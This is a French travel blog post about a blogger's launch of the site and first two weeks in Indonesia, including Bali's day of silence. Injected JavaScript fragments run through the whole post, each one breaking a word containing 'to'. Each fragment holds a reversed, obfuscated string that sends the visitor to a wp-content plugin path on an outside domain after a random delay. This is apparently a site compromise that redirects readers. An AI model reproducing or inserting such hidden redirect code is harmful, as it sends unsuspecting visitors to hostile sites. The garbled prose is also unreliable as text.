2 semaines en Indonésie et Publication du Blog

Tadah !

Woulay bilay le blog est sorti. J’vais pouvoir faire mon Mickey et dire que je suis une blogueuse mode. C’est une première version, il va évoluer petit à petit, ne pleures pas toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout de suite s’il te plaît. Mais au moins, maintenant je peux raconter mes petites aventures et mes problèmes d’égo aux copains hihihi.

Aujourd’hui, ça fait pile 2 semaines que je suis arrivé en Indonésie. Il y a des moments chouettes, des moments moins chouettes, mais globalement c’est plutôt cool d’être ici. Je ne connaissais rien de l’Indonésie, et je n’y connais toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toujours pas grand chose. J’ai juste été 2 jours à Jakarta, 1 semaine à Magelang et maintenant je passe 10 jours à Bali. Vu la taille du pays (plus de 13.000 îles), je suis loin de connaître le coin.

Plage au sud de Yogyakarta

Même si j’ai déjà vu des paysages uniques.

Parfois les images se répètent entre le blog et le site photoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, c’est le début, je n’ai pas encore tant d’images que ça. Là ça fait trois jours que je me suis enfermé dans mon Airbnb pour travailler (finir le blog, corriger des bugs sur des sites, montage d’une vidéo), autant dire que j’ai hâte de faire ma prochaine sortie !

L’Indonésie c’est comment ?

L’Indonésie, c’est choupi. Ça dépend des coins, mais il y a des choses incroyables à voir ici. Il n’y a pas un moment ou un endroit que j’ai plus retenu qu’un autre. Juste les gens sont très différents ici. Les Indonésiens sont très souriants et aiment beaucoup papoter avec les toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}touristes qui le veulent bien. À Bali il y a aussi beaucoup de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}touristes qui sont beaucoup moins souriants, mais dans les endroits peu fréquentés, c’est super agréable de partager une soupe avec des locaux.

Entre les temples, les montagnes, les plages et les bars, il y a pas mal de moyens de s’occuper. Demain j’ai prévu de faire un peu de route pour visiter un temple, il y a pas mal de choses à voir dans ce coin là, ça devrait m’occuper la journée si je pars tôt. J’ai prévu de partir à la découverte de Bali pendant les trois prochains jours. Si j’peux me caler une petite session de snorkeling, ce serait gg wp.

Pourquoi partir à l’aventure seulement 3 jours Rimka maître penseur ?

Et bien toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout simplement car le 17 Mars il y a une « fête » locale, qui n’existe qu’à Bali, qui consiste à rester chez soi, ne pas allumer les lumières, et méditer. Ça arrive une fois par an. Je suis à Bali pendant 10 jours, j’avais donc 10 chances sur 365 pour toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomber sur la journée nulle de Bali.

J’en profiterai pour me cacher sous la couette et regarder des tutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos lifestyle ou écrire un article en plus sur ce magnifique blog que tu aimes déjà.

Le pluie depuis mon Airbnb

Aujourd’hui il pleuvait, c’est pourquoi je suis resté dans mon lit à travailler hihihi.

Enfin bon, j’te parlerais un peu plus de ce que ça fait de voyager seul dans les prochains articles. Là ça fait seulement 5 jours que je suis officiellement seul, et j’ai quand même passé du temps avec pas mal de gens. En attendant si ça t’enjailles, et par ce que mon plugin de référencement me harcèle avec ça : Tu peux lire mon article précédent. Globalement t’es pas obligé, tu le lis si ça te fais plaisir. À plus !

La cascade de Nungnung

Article Suivant

Arrivée en Indonésie

Article Précédent